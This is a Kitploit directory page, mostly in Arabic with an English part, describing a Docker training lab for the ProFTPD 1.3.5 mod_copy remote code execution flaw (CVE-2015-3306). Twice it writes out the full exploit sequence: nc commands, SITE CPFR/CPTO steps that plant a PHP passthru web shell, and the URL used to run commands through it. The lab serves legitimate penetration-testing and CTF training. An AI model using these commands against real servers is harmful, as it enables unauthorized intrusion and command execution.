Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-3306-Home-Lab — CVE-2015-3306 - ProFTPD - RCE إعداد مختبر منزلي (Docker) سهل الاستخدام لـ Red Teaming أو Penetration Testing | Kitploit
أدوات/GitHubGitHub/netw0rk7/cve-2015-3306-home-lab
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمالفريق الأحمرمختبرات وتدريب عملي
GitHubnetw0rk7/cve-2015-3306-home-lab

CVE-2015-3306-Home-Lab

CVE-2015-3306 - ProFTPD - RCE إعداد مختبر منزلي (Docker) سهل الاستخدام لـ Red Teaming أو Penetration Testing

عرض المستودع
2منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الإنجليزية أدناه

ProFTPD 1.3.5 (mod_copy) — معمل محاكاة RCE

CVE20153306

تم تصميم هذا المعمل لمحاكاة الثغرة CVE-2015-3306 — ProFTPD mod_copy نسخ الملفات عن بُعد إلى تنفيذ الأوامر عن بُعد (RCE)
يُستخدم للتعلم على Web Shell Injection RCE عبر وحدة mod_copy الخاصة بـ ProFTPD.


الميزات

  • ProFTPD 1.3.5 ثغري (قابل للاستغلال)
  • تفعيل كامل لوحدة mod_copy (SITE CPFR / SITE CPTO)
  • دعم دخول FTP مجهول (Anonymous FTP)
  • Apache2 + PHP5 لمحاكاة جذر الويب /var/www/html
  • يمكن للمهاجم استخدام SITE CPFR/CPTO لنسخ ملف إلى جذر الويب من أجل تشغيل RCE
  • النظام يُنشئ تلقائيًا في كل مرة يبدأ فيها الحاوية (container)
flag_RANDOM.txt
  • هذا معمل مخصص لـ CTF / فريق الاختراق / تدريب اختبار الاختراق

  • هيكل الدليل

    root@kitploit:~
    /etc/proftpd/proftpd.conf
    /usr/local/proftpd/
    /var/www/html/
    /tmp/flag_xxx.txt
    /entrypoint.sh
    

    الاستخدام (تشغيل الحاوية)

    root@kitploit:~
    docker build -t sentinel7-proftpd-lab .
    docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab
    

    طريقة اختبار الثغرة CVE-2015-3306

    root@kitploit:~
    nc <IP> 21
    SITE CPFR /proc/self/cmdline
    SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
    
    SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
    SITE CPTO /var/www/html/webshell.php
    

    الوصول عبر الويب:

    root@kitploit:~
    http://<IP>/webshell.php?cmd=<command>
    

    العلم (Flag)

    يُحفظ في:

    root@kitploit:~
    /tmp/flag_RANDOM.txt
    

    النسخة الإنجليزية — معمل ProFTPD 1.3.5 (mod_copy) RCE

    يحاكي هذا المعمل CVE-2015-3306 باستخدام ProFTPD 1.3.5 مع mod_copy، مما يسمح للمهاجمين بتنفيذ ProFTPD mod_copy نسخ الملفات عن بُعد إلى RCE.


    الميزات

    • ProFTPD 1.3.5 ثغري مُجمّع من المصدر
    • تفعيل mod_copy (SITE CPFR + SITE CPTO)
    • دخول FTP مجهول
    • Apache2 + PHP5 لتنفيذ الـ webshell
    • إنشاء تلقائي لـ flag_RANDOM.txt عند بدء الحاوية
    • مثالي لـ CTF والتعليم وبحوث الاستغلال

    مثال اختبار الاستغلال

    root@kitploit:~
    nc <IP> 21
    SITE CPFR /proc/self/cmdline
    SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
    
    SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
    SITE CPTO /var/www/html/webshell.php
    

    ثم نفذ:

    root@kitploit:~
    http://<IP>/webshell.php?cmd=<command>
    

    موقع العلم

    root@kitploit:~
    /tmp/flag_RANDOM.txt
    

    إخلاء مسؤولية

    للاستخدام التعليمي واختبار الاختراق المصرح به فقط.

    تنزيل الأداة